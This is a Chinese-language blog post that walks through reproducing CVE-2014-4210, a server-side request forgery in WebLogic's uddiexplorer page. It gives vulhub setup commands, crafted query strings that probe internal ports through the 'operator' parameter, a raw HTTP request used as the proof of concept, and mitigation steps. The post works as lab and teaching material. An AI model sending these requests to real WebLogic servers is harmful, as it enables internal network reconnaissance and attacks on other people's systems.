CVE-2014-4210 Weblogic SSRF

发布于 2021-08-10  61 次阅读


漏洞描述

Weblogic中的uddiexplorer可以直接访问,在SearchPublicRegistries.jsp页面存在一个Get型参数operator,没有对请求资源进行限制,产生SSRF漏洞。利用该漏洞可以发送任意HTTP请求,进而攻击内网中redisfastcgi等脆弱组件。

漏洞影响

  • Weblogic 10.0.2Weblogic 10.3.6

漏洞复现

环境搭建

使用vulhub进行漏洞环境的搭建,为了体现SSRF的危害,该环境中还存在redis

cd /vulhub-master/weblogic/ssrf
docker-compose up -d

访问http://your-ip:7001/uddiexplorer/,如图所示,环境搭建成功。

image-20210810095055696

产生原因

Weblogic中的uddiexplorer可以直接访问,在SearchPublicRegistries.jsp页面存在一个Get型参数operator,没有对请求资源进行限制,产生SSRF漏洞。

攻击过程

内网探测

  • 访问内网存活ip
image-20210810110630176
  • 访问内网不存活ip,出现Not route to host
  • 访问内网中开放的端口,探测到存在的端口提示404错误
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
  • 访问内网中不存在的端口,提示连接失败
uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:6666
image-20210810100327722

可以通过错误的不同,探测内网的状态

漏洞POC

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

修复方案

  • 直接删除uddiexplorer.war中的SearchPublicRegistries.jsp
  • nginx 配置拦截 uddiexplorer 不让访问

参考链接

https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf